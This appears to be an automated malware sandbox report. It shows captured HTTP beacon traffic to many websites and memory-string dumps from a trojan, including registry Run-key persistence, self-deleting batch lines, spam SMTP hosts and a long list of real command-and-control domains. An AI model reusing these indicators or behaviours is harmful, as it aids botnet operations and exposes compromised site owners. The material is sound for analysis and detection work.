User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: qistech.com

Connection: Keep-Alive

Cache-Control: no-cache

...-~7..4.a0.`.1..(3V..4..5..S7xH.8...:...;...=jgx> ..?..?A.%.BB..D.NjE...F.x1H=
.I...Ks..LI1.M..<O..:.^S6R...W.~.T....k..W.?.Y.7.[.
HTTP/1.1 302 Found

Date: Sat, 12 Apr 2014 14:42:05 GMT

Server: Apache

Location: hXXp://VVV.qistech.com/

Content-Length: 207

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://VVV.qistech.com/">here</a>.</p>.</body&
gt;</html>...

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 52

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: benefits-inc.com

Connection: Keep-Alive

Cache-Control: no-cache

j*/2 ..3.S.4..Y6B}.7..!9...:d;.;..K=.d.>...@<.vA.".B
HTTP/1.1 500 Internal Server Error

Date: Sat, 12 Apr 2014 14:42:04 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 251

Connection: keep-alive

Keep-Alive: timeout=30

Server: Apache/2

X-Powered-By: PHP/5.2.17

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">
;.<head>.<meta http-equiv="Content-Type" content="text/html; 
charset=utf-8" />..<title>Database Error</title>..</
head>.<body>..<h1>Error establishing a database connect
ion</h1>.</body>.</html>...

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 512

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: hostphd.com.br

Connection: Keep-Alive

Cache-Control: no-cache

M6p2WCqBmqHs48u7DT7Yne2H6oNaoL90/sXjJM0VBGK/RhAcwekMwyHfauEE24Pb

dZHTE/SX8xxDK1FAoq98WFQ4NIWAbTEEg0WStuRGWqcsudFBthxx1d5VVOa7Y3Hn

ssK/xXd0YEYrAm1fhp6hrAzYRMjeq2Wf9vSS/rYc0CxKCrvo3bUojX3Qrg5vBb1u

csA7yD05wnN8xCQ53Ztr4jXGPjCIepQ/sgCEgjjjgdVFieYWdMPHQcW894CbS7Bn

icnto x7YLixUeU1dTEiYFgeXSAfHukOS m5cc1x7fkC8C6wL7KAWBGnIORb8VrU

pfmX6V0poWE0MxheyDLYuLVeDEEkUyOxYFaos/4tfF3NB9vX28ZBuMVSGMQkSVqg

CA4OZ1QGCwzMEDSBDKO1rNzIRFYOiMo1pK5aGm4A/lKc82Z9gKDz 7aqn3eUQx3J

vUWGIBMQqzjJ2quu6Dd1BJDU7uc/k8r TBkXGMzYffhu7Q==


HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:40:26 GMT

Server: LiteSpeed

Accept-Ranges: bytes

Connection: close

Last-Modified: Sun, 23 Mar 2014 15:46:09 GMT

Content-Type: text/html

Content-Length: 24609
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<META HTTP-EQUIV
="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<title&
gt;Hospedagem de Sites Ilimitada, Revenda de Hospedagem, Hospedagem de
 Sites Windows, Linux , SEO ,HOSTPHD</title>.<meta http-equiv
="Content-Language" content="pt-br" />.<meta name="TITLE" conten
t="Hospedagem de Sites Ilimitada, Revenda de Hospedagem, Hospedagem de
 Sites Windows, Linux , SEO ,HOSTPHD" />..<meta name="KEYWORDS" 
content="Hospedagem de Sites, Ilimitada, trafego ilimitado,Revenda de 
Hospedagem, Windows, Linux, Streaming, Vps, dedicados, dominios, patro
cinios,construtor, revenda ilimitada, whmcs, construtor sites"/>..&
lt;meta name="DESCRIPTION" content="Hospedagem de Sites Ilimitada, tra
fego ilimitado,Revenda de Hospedagem, Hospedagem de Sites Windows, Lin
ux, Streaming, Vps, dedicados, dominios, patrocinios,construtor" />
..<meta name="ABSTRACT" content="Hospedagem de Sites: Hospedagem de
 Sites, Planos de Revenda, Servidores Dedicados, Hospedagem de Sites L
inux, Hospedagem de Sites Windows, Planos de Revenda Linux, Planos de 
Revenda Windows, Revenda Windows, Revenda Linux, Servidor Dedicado Lin
ux, Servidor Dedicado Windows, Servidores Dedicados Windows, Servidore
s Dedicados Linux, Servidores Dedicados Linux com cPanel, Servidores D
edicados Windows com Plesk, Registros de Dom.nio Internacional, Re<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 558

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: justconnect.co.za

Connection: Keep-Alive

Cache-Control: no-cache

g 514cJmzZ9YvQo9tXfAOUW1Rn/SMa/FFjG76dyi16euQ1jlc8KnYCbztEKryKoT

LxAM37IZJztGo/vLX5n/dfN6QpP1 kpOj7ncfXzra0jTlAQWpO 4I/KKSbPKWz2n

eZPVrb8 ieYDh92V5X50h9smD ALLPLvKI2cQqdMdHy4LGzuhympMsftEFHlEDbw

GPKEuxhh7GdZ0VY/ZHQZF7fAo2P3ugPg4V85cknQASuXWWF4ETigysVZBWEJknIb

c/YJsL8Qp6IUAii3PEXWNuWpLRGP5jqqu4iVhL4mVok84l902tX8Rqr9kfy9UKp8

UaUB0xyvRuxlbqKk3o sveGgur3eP5AfO2w79oxQLlm6cxbzle0nEzLrWOLz3pcg

5zD9KXuH3DzvlDdVyO71GIockBlJqiYBfpiAst0TcXtEFLTSN3UJ9WQfD4R0sKT9

KK82QUtzkO5Bd9MxcIZmoGU6YyBV396WPfyEQmrng39mlJpoYHPjFSoRgPSPK5wb

svXH9HCl31mnIJasmmh5Qc8rzA==


HTTP/1.1 301 Moved Permanently

Server: nginx/1.1.19

Date: Sat, 12 Apr 2014 14:40:16 GMT

Content-Type: text/html

Content-Length: 185

Connection: keep-alive

Location: hXXp://VVV.justconnect.co.za/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.1.19</center>..</body>..</html>....

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 508

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: cgc-england.com

Connection: Keep-Alive

Cache-Control: no-cache

YNTuWPZH0Z81 RKCUZ7Bw5kQJdYWHZGyiqu4sceIttvp7L3ZYZq1SX8FFW5cQn7D

LXHUhz0Dhbh/Mpx9/o3ynocEQn3OKrNlFu9hKGMA3l14PZD9HNYPL18UYu48XYPn

gm7PGH26Jmtbs5rJPeR CcVKhRKzRaXzcPvJt6eCRxzO/sx18cKGNhLz42ad1Bz0

XAGNId5taMYWN7WnZFH22XSNeDgnmz9LQmPfD7Ho53WUcJVbBtMW6phW2/ijScrl

BeUW7FVQ8GC7Wk4ugpLKbwQXV23hW75N 0kwwwa5Jci w0J93 yhHOt/8dZ z Sg

CYJM1lpPDoUEHkYLYibG8vC0VFM9/oczrBBxPW48Divlp/b8hlO2aj0xzcoFluE2

zUTB9GWYj8VHv8ijspba1wwF K15KXDCcQ2EBm9x7Fswpd 0LftqEPi2m3Nk ilr

CJO9xM9XKBW9eSWUWzIVl8YXwvAd/A1N0GPCk4s6Vw==


HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:40:16 GMT

Server: Apache

Last-Modified: Fri, 17 Jan 2014 11:51:26 GMT

Accept-Ranges: bytes

Content-Length: 13968

Keep-Alive: timeout=2, max=90

Connection: Keep-Alive

Content-Type: text/html

Content-Language: fr
<!DOCTYPE html>.<html lang="fr-FR" prefix="og: hXXp://ogp.me/
ns#" class="no-js  csstransforms no-csstransforms3d csstransitions">
;.<head>.<meta http-equiv="Content-Type" content="text/html; 
charset=UTF-8">....<meta charset="utf-8">.....<title>CA
MBRIDGE GARDENS COLLEGE | English Language School in Hastings</titl
e>...........<!-- Mobile Specific Metas.  .=====================
============================= -->..<meta name="viewport" content
="width=device-width, initial-scale=1, maximum-scale=1"> ....<li
nk rel="profile" href="hXXp://gmpg.org/xfn/11">..<link rel="alte
rnate" type="application/rss xml" title="RSS 2.0" href="hXXp://VVV.cgc
-england.com/feed/">..<link rel="alternate" type="text/xml" titl
e="RSS .92" href="hXXp://VVV.cgc-england.com/feed/rss/">..<link 
rel="alternate" type="application/atom xml" title="Atom 0.3" href="htt
p://VVV.cgc-england.com/feed/atom/">..<link rel="pingback" href=
"hXXp://VVV.cgc-england.com/xmlrpc.php">..<link rel="shortcut ic
on" href="flavicon.png" type="image/gif">............<meta name=
"robots" content="noindex,nofollow">..<!-- This site is optimize
d with the Yoast WordPress SEO plugin v1.4.13 - hXXp://yoast.com/wordp
ress/seo/ -->.<link rel="canonical" href="hXXp://VVV.cgc-england
.com/">.<meta property="og:locale" content="fr_FR">.<meta 
property="og:type" content="website">.<meta property="og:title" 
content="CAMBRIDGE GARDENS COLLEGE - English Language School in Ha<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 254

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: tsu-box.com

Connection: Keep-Alive

Cache-Control: no-cache

........!`..2. .C.6.T}K.e.`.v;v......_...$.......H-...B...X.%fm.6...G$..e....H.......l ...N..*K...`....N.....'..6...08.Vs...i.(.......m..r.......0.......

.%.9.6.N.G>d.X.y.i...z[...........x...=....B..aW...l..

:..KD..\...m...~a...&5...J..Jy..........g
HTTP/1.1 500 Internal Server Error

Date: Sat, 12 Apr 2014 14:42:12 GMT

Server: Apache

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Last-Modified: Sat, 12 Apr 2014 14:42:13 GMT

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=utf-8
3a..<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml
"..57..>.<head>.<meta http-equiv="Content-Type" content="t
ext/html; charset=utf-8" />..<title>..1b.....................
..........1e..</title>..</head>.<body>..<h1>..
27...........................................16..</h1>.</body
>.</html>...0..

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: VVV.biurimex.pl

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Connection: Keep-Alive

Content-Length: 3966

Content-Type: text/html

Date: Sat, 12 Apr 2014 14:42:04 GMT

Last-Modified: Fri, 26 Jul 2013 10:07:38 GMT

Server: IdeaWebServer/v0.80
<html>..<head>..<meta http-equiv=Content-Type content="
text/html; charset=windows-1250">..<meta name=Generator content=
"Microsoft Word 11 (filtered)">..<title> </title>..<
style>..<!--.. /* Font Definitions */.. @font-face...{font-famil
y:Tahoma;...panose-1:2 11 6 4 3 5 4 4 2 4;}.. /* Style Definitions */.
. p.MsoNormal, li.MsoNormal, div.MsoNormal...{margin:0cm;...margin-bot
tom:.0001pt;...font-size:12.0pt;...font-family:"Times New Roman";}..h1
...{margin-right:0cm;...margin-left:0cm;...font-size:24.0pt;...font-fa
mily:"Times New Roman";...font-weight:bold;}..a:link, span.MsoHyperlin
k...{color:blue;...text-decoration:underline;}..a:visited, span.MsoHyp
erlinkFollowed...{color:purple;...text-decoration:underline;}..p...{ma
rgin-right:0cm;...margin-left:0cm;...font-size:12.0pt;...font-family:"
Times New Roman";}..@page Section1...{size:595.3pt 841.9pt;...margin:7
0.85pt 70.85pt 70.85pt 70.85pt;}..div.Section1...{page:Section1;}..--&
gt;..</style>..</head>..<body lang=PL link=blue vlink=p
urple>..<div class=Section1>..<p class=MsoNormal align=cen
ter style='text-align:center'><img width=1100..height=733 src="i
ndex_pliki/image001.jpg"></p>..<p class=MsoNormal> 
;</p>..<p class=MsoNormal> </p>..<p class=Ms
oNormal> </p>..<p class=MsoNormal align=center style=
'text-align:center'><span..style='font-size:36.0pt;color:red'>
;STRONA W BUDOWIE!</span></p>..<p class=MsoNormal a<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 562

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: icigrain.com

Connection: Keep-Alive

Cache-Control: no-cache

zS6Ivowp3aSdrnAK99fjyJ/k3kJk9RH3gIvnK2niMMPM4vg9lV2OW5iN 8Ra2tJh

pJURHd9S6UXzd/tuPpKPmA07BSlOCX/rj2yH46d92z3uZdWnZH8Hq ZOatC 9qQz

H0D/o5FR5c o3LGggYLF9nL cA9MrVr9u0veWNN5BBrkrAM7ir5agh00g/yNxl/

tT4IjYS NUoGMLA03S8WWrBiiIUGoWjQ4KYSjZA0WZYdCXzLZxlnIDx3DhH3hDus

SkbQ700DHvxGN/dKTwkQPGZSidupXYme/8gMPCkMT4ZWlu6phgu7JFPEfLwlMzer

xmPj8Po8azhssgcSDzRreqKMpKL/STQRsvdXhjBdj iIAGVMCzX2Rmk1se9zOCYF

3Ei3MEgZtCz7MNZh2HvKDR2Pcx4a8PAsPzbgLZaMo/F5 iB2cdnhTOOiZ77ZImR8

wdlOnfGPqK8IH4bR2/5oID3LsQdjjtSr3vF4LCoMtpZLyBDiSvaZ3c66cFXqLnk7

7STlLOX3IPgDFsJD/wvkDIEKyPFpKA==


HTTP/1.1 301 Moved Permanently

Date: Sat, 12 Apr 2014 14:40:46 GMT

Server: LiteSpeed

Connection: Keep-Alive

Keep-Alive: timeout=5, max=100

X-Powered-By: PHP/5.4.22

Set-Cookie: PHPSESSID=16cee3056eb3b31f92edc74b47b72b7f; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

X-Pingback: hXXp://VVV.icigrain.com/xmlrpc.php

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.icigrain.com/

Content-Length: 0

HTTP/1.1 301 Moved Permanently..Date: Sat, 12 Apr 2014 14:40:46 GMT..S
erver: LiteSpeed..Connection: Keep-Alive..Keep-Alive: timeout=5, max=1
00..X-Powered-By: PHP/5.4.22..Set-Cookie: PHPSESSID=16cee3056eb3b31f92
edc74b47b72b7f; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-
Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=
0..Pragma: no-cache..X-Pingback: hXXp://VVV.icigrain.com/xmlrpc.php..C
ontent-Type: text/html; charset=UTF-8..Location: hXXp://VVV.icigrain.c
om/..Content-Length: 0..

JRY7B2.tmp_3796:

.text

`.rdata

.rsrc

9m,.spLoadImageA

R:\jfndh8883.dat

user32.dll

kernel32.dll

gdi32.dll

zxc098iuser32.dll

%,'gdi32.dll

[t.Kx

WG.OK

.hM-n

&n%cv|n

q*.AglS

x;P.IB

.sd~'\B4W

&sourly

thoughts compass

&Passion search

&Leahy's unascertained

&windows

pillars halted trying certainly

sports

&report located

&ports

&Alderman KEYES

4,1,4,24

welled.exe

JRY7B2.tmp_3796_rwx_04000000_0000F000:

.text

`.rdata

@.data

.reloc

software\microsoft\windows\currentversion\run

%s\%s.exe

Content-Length: %d

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

\system32\svchost.exe

software\microsoft\windows\currentversion

del %s

if exist %s goto :repeat

http://%s

kernel32.dll

smtp.compuserve.com

mail.airmail.net

smtp.directcon.net

smtp.sbcglobal.yahoo.com

smtp.mail.yahoo.com

smtp.live.com

CRYPT32.dll

PSAPI.DLL

USERENV.dll

IPHLPAPI.DLL

HttpQueryInfoA

HttpSendRequestA

HttpAddRequestHeadersA

HttpOpenRequestA

InternetCrackUrlA

WININET.dll

WS2_32.dll

SHLWAPI.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

CryptImportKey

CryptDestroyKey

CryptExportKey

CryptGenKey

ADVAPI32.dll

ole32.dll

http://%s/

InternetOpenUrlA

zc)%c

-9276543007814

%Documents and Settings%\%current user%\sufkywiddeax.exe

53595`5}5

9-9K9}9

?$?(?,?0?4?

JRY7B2.tmp_3796_rwx_08900000_00012000:

.text7d/

~.rdata

.Lv~EF4)

.text

`.rdata

@.data

.reloc

software\microsoft\windows\currentversion\run

%s\%s.exe

Content-Length: %d

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

\system32\svchost.exe

software\microsoft\windows\currentversion

del %s

if exist %s goto :repeat

http://%s

kernel32.dll

smtp.compuserve.com

mail.airmail.net

smtp.directcon.net

smtp.sbcglobal.yahoo.com

smtp.mail.yahoo.com

smtp.live.com

CRYPT32.dll

PSAPI.DLL

USERENV.dll

IPHLPAPI.DLL

HttpQueryInfoA

HttpSendRequestA

HttpAddRequestHeadersA

HttpOpenRequestA

InternetCrackUrlA

WININET.dll

WS2_32.dll

SHLWAPI.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

CryptImportKey

CryptDestroyKey

CryptExportKey

CryptGenKey

ADVAPI32.dll

ole32.dll

http://%s/

InternetOpenUrlA

zc)%c

-9276543007814

53595`5}5

9-9K9}9

?$?(?,?0?4?

@.reloc

@595`5}5

-9K9}

KERNEL32.DLL

svchost.exe_1876:

.text

`.data

iphlpapi.dll

inetcomm.dll

operator

KERNEL32.DLL

kernel32.dll

mscoree.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

GetProcessWindowStation

USER32.DLL

EX8^/u$9^%u

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHLWAPI.dll

WS2_32.dll

HttpQueryInfoA

HttpSendRequestA

HttpOpenRequestA

WININET.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

DNSAPI.dll

GdiplusShutdown

gdiplus.dll

GDI32.dll

ole32.dll

ShellExecuteA

SHELL32.dll

GetCPInfo

J<_T.

f%fR9

Z;3*/Z%x

&EL.Gb

!"7'$%6:)* ,-./02345&(#>;=?98< 1

%System%\regedit.exe

220 Mail.Ru ESMTP

220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp

220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp

220 mx4.messagingengine.com ESMTP . No UCE permitted.

svchost.exe_2960:

.text

`.data

iphlpapi.dll

inetcomm.dll

operator

KERNEL32.DLL

kernel32.dll

mscoree.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

GetProcessWindowStation

USER32.DLL

EX8^/u$9^%u

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHLWAPI.dll

WS2_32.dll

HttpQueryInfoA

HttpSendRequestA

HttpOpenRequestA

WININET.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

DNSAPI.dll

GdiplusShutdown

gdiplus.dll

GDI32.dll

ole32.dll

ShellExecuteA

SHELL32.dll

GetCPInfo

?|G9Y
Vc!.UY
3>&< 0&.;
-i0}|
|.Xi/
!"7'$%6:)* ,-./02345&(#>;=?98< 1
mas.lavasoft.com
%System%\regedit.exe
[184.107.38.38]
220 Mail.Ru ESMTP
220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp
220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.

svchost.exe_1876_rwx_04000000_00008000:


.text
`.rdata
@.data
.reloc
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: %d
http://%s/
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
KERNEL32.dll
USER32.dll
ole32.dll
zc)%c
cwmbranford.co.uk;ravaseguros.com.br;yasu-ragi.com;x-calibur.net;cvi.or.jp;huntscombo.com;marketingservicesnetwork.ca;crossroadsfcu.org;wateratwork.net;virtualblackfox.net;ewapps.com;keyad.com;npac.org.hk;khl.org.uk;ifta.org;gomadagascar.com;obiring.com;simplysup1.com;hopkintonnh.us;c21champs.com;sulsters.net;pluginz.ru;sitn.co.uk;aimusa-online.com;madmimi.com;felipegarrote.com;completemarketingsystems.com;kioil.com;siriusgt.com;b-met.com;samuraitours.com;revocars.com;jigami.com;intercountrymanagement.fr;ctl-components.co.uk;yano-jyuken.com;fratelliferrara.com;johnnykimono.com;lee-insurance.com;curiotu.com.tw;cabletech.co.za;dokument-festival.cz;009design.com;waffaartist.com;roofmaterials.com;fujisangyo.com;lists.riseup.net;akcja.pl;hf-cpa.com;disenosdaniel.com;radionovelli.com;pro-cert.org;ffvbbeach.org;premierimage.net;okchalets.com;visionpro.com.sg;kent67.com;krenim.org;darus.lt;flobeds.com;penrithgolfclub.com.au;goodmorningchildren.com;presentdirectory.com;zurbuchen.com;yellowstarcarpet.com;huthbenders.com;fgcm.net;marbach.com;aikomusic.com;qistech.com;torkair.com;loteria1benifaio.com;diaperlab.com;skspring.com;harpersphoto.co.uk;mesutreklam.com;syxht.com;mcmjobes.com;discoveryplace.org;softronmedia.com;destolfos.com;royalbotania.net;appliedspectra.com;differentimages.nl;saragazarek.com;teamboo.com;vitalhealthsoftware.com;tri-c.com;proadec.com.br;martineaumorris.com;garywollin.com;forest43.ru;theanniversarycompany.com;jonglierkatakomben.com;ogdenscoaches.com.au;madamlau.com;thatcherenergy.com;maximilianeum.ch;thedevines.com;mrwconnected.com;apnm.org;alfaglass.ru;greshams.com;jivarogroup.com;hospedagemsegura.com.br;cogmap.com;centralinsumos.com.bo;pisomania.com;metall-auer.at;fiskmarilia.com.br;desaxeoflondon.com;amberhotels.cz;verdeuropa.com;casescases.com;machprint.com;gerard-alsacien.com;branaganmeats.com;maewang.com;calcitrusquality.org;shinpd.com;polybeekindia.com;lapanthera.hu;coplanar.seobook.com;dogrings.com;vinaysaraf.com;storci.com;catholic-school-girls.com;snyderfd.com;onalaptop.com;tushlicking.com;ogaemon.com;tobler-skele.bg;fullmoons-cauldron.co.uk;dotnetpia.co.kr;electroexhibits.com;aecnet.co.jp;zenka-influence.com;himalayanhandicrafts.com;tokai-service.com;lingewaelsche.com;crwconsulting.com;cefam-atlas.fr;norcalclothingco.com;edfmodel.com;matrax.bg;ivcircus.ru;anemomylos.com;dancerecords.net;markusworks.com;ftzworld.com;benefits-inc.com;robins-enterprises.com;autohaus-repp.de;chazzlayne.com;illustrateur-jeunesse.com;astrolabio.net;kosovaere.com;thesyntheticfamily.com;takeuchi-ladies.com;nox.sk;designonglass.com;cadbaz.com;sceram.com;viainfo.net;galanos.com;mawsonclub.com.au;2wheelife.com;bandera-roja.com;kmsauto.com;prism-medical.com;durandigitalmedia.com;xanthus-farm.com;gelpass.com;doehrer.com;skischule-fankhauser.com;ascomp.com.pl;lasgo.co.uk;familyfinanse.pl;denno-insatsu.com;fullcas.com;centrevillesettlement.com;cinenganos.com;roma-studio.com;nextone-net.com;costadelsolestate.com;academia-elestudiante.com;bestebproperties.com;iputra.edu.my;alc-mg.com;medisurg.com;welbilt-thailand.com;academiamc.com;ks110.com;polishpotterydirect.com;toshindo-pub.com;bernois-tourtour.com;luckygroup.biz;rustytruckmusic.com;princetonhistory.org;losiracundos.com;tsu-box.com;ballarattiles.com.au;sugarfoote.com;m4m-usa.com;tk-a.com;xbox-gamer.net;contracorriente.com;bonafidekrewe.com;imaginehomessa.com;greenworkspc.com;sunbird-images.com;pyxis2.org;theoldciderhouse.co.uk;underdoglaw.com;printscharmingbc.ca;legalserver.org;mcvdberg.co.za;atelier-enseignes.com;bureauriscos.com.br;bizeulimmobilier.com;sansum.org;jpcreative.com;mhww.org;nwinnovation.com;namedecision.com;barattare.net;pattilyles.com;vitaliamedspava.com;min3.sakuraweb.com;gabinetemilitar.mg.gov.br;ultimate-tattoo-tips.com;frankfalvo.com;ta-shanghai.com;silverehitus.ee;jaguarlimousineservices.com;autoquipsales.com;hebbes.nl;

svchost.exe_1876_rwx_13140000_01550000:


.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
J<_T.
f%fR9
Z;3*/Z%x
&EL.Gb
!"7'$%6:)* ,-./02345&(#>;=?98< 1
%System%\regedit.exe
220 Mail.Ru ESMTP
220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp
220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.

svchost.exe_2960_rwx_04000000_00008000:


.text
`.rdata
@.data
.reloc
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: %d
http://%s/
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
KERNEL32.dll
USER32.dll
ole32.dll
zc)%c
cwmbranford.co.uk;ravaseguros.com.br;yasu-ragi.com;x-calibur.net;cvi.or.jp;huntscombo.com;marketingservicesnetwork.ca;crossroadsfcu.org;wateratwork.net;virtualblackfox.net;ewapps.com;keyad.com;npac.org.hk;khl.org.uk;ifta.org;gomadagascar.com;obiring.com;simplysup1.com;hopkintonnh.us;c21champs.com;sulsters.net;pluginz.ru;sitn.co.uk;aimusa-online.com;madmimi.com;felipegarrote.com;completemarketingsystems.com;kioil.com;siriusgt.com;b-met.com;samuraitours.com;revocars.com;jigami.com;intercountrymanagement.fr;ctl-components.co.uk;yano-jyuken.com;fratelliferrara.com;johnnykimono.com;lee-insurance.com;curiotu.com.tw;cabletech.co.za;dokument-festival.cz;009design.com;waffaartist.com;roofmaterials.com;fujisangyo.com;lists.riseup.net;akcja.pl;hf-cpa.com;disenosdaniel.com;radionovelli.com;pro-cert.org;ffvbbeach.org;premierimage.net;okchalets.com;visionpro.com.sg;kent67.com;krenim.org;darus.lt;flobeds.com;penrithgolfclub.com.au;goodmorningchildren.com;presentdirectory.com;zurbuchen.com;yellowstarcarpet.com;huthbenders.com;fgcm.net;marbach.com;aikomusic.com;qistech.com;torkair.com;loteria1benifaio.com;diaperlab.com;skspring.com;harpersphoto.co.uk;mesutreklam.com;syxht.com;mcmjobes.com;discoveryplace.org;softronmedia.com;destolfos.com;royalbotania.net;appliedspectra.com;differentimages.nl;saragazarek.com;teamboo.com;vitalhealthsoftware.com;tri-c.com;proadec.com.br;martineaumorris.com;garywollin.com;forest43.ru;theanniversarycompany.com;jonglierkatakomben.com;ogdenscoaches.com.au;madamlau.com;thatcherenergy.com;maximilianeum.ch;thedevines.com;mrwconnected.com;apnm.org;alfaglass.ru;greshams.com;jivarogroup.com;hospedagemsegura.com.br;cogmap.com;centralinsumos.com.bo;pisomania.com;metall-auer.at;fiskmarilia.com.br;desaxeoflondon.com;amberhotels.cz;verdeuropa.com;casescases.com;machprint.com;gerard-alsacien.com;branaganmeats.com;maewang.com;calcitrusquality.org;shinpd.com;polybeekindia.com;lapanthera.hu;coplanar.seobook.com;dogrings.com;vinaysaraf.com;storci.com;catholic-school-girls.com;snyderfd.com;onalaptop.com;tushlicking.com;ogaemon.com;tobler-skele.bg;fullmoons-cauldron.co.uk;dotnetpia.co.kr;electroexhibits.com;aecnet.co.jp;zenka-influence.com;himalayanhandicrafts.com;tokai-service.com;lingewaelsche.com;crwconsulting.com;cefam-atlas.fr;norcalclothingco.com;edfmodel.com;matrax.bg;ivcircus.ru;anemomylos.com;dancerecords.net;markusworks.com;ftzworld.com;benefits-inc.com;robins-enterprises.com;autohaus-repp.de;chazzlayne.com;illustrateur-jeunesse.com;astrolabio.net;kosovaere.com;thesyntheticfamily.com;takeuchi-ladies.com;nox.sk;designonglass.com;cadbaz.com;sceram.com;viainfo.net;galanos.com;mawsonclub.com.au;2wheelife.com;bandera-roja.com;kmsauto.com;prism-medical.com;durandigitalmedia.com;xanthus-farm.com;gelpass.com;doehrer.com;skischule-fankhauser.com;ascomp.com.pl;lasgo.co.uk;familyfinanse.pl;denno-insatsu.com;fullcas.com;centrevillesettlement.com;cinenganos.com;roma-studio.com;nextone-net.com;costadelsolestate.com;academia-elestudiante.com;bestebproperties.com;iputra.edu.my;alc-mg.com;medisurg.com;welbilt-thailand.com;academiamc.com;ks110.com;polishpotterydirect.com;toshindo-pub.com;bernois-tourtour.com;luckygroup.biz;rustytruckmusic.com;princetonhistory.org;losiracundos.com;tsu-box.com;ballarattiles.com.au;sugarfoote.com;m4m-usa.com;tk-a.com;xbox-gamer.net;contracorriente.com;bonafidekrewe.com;imaginehomessa.com;greenworkspc.com;sunbird-images.com;pyxis2.org;theoldcid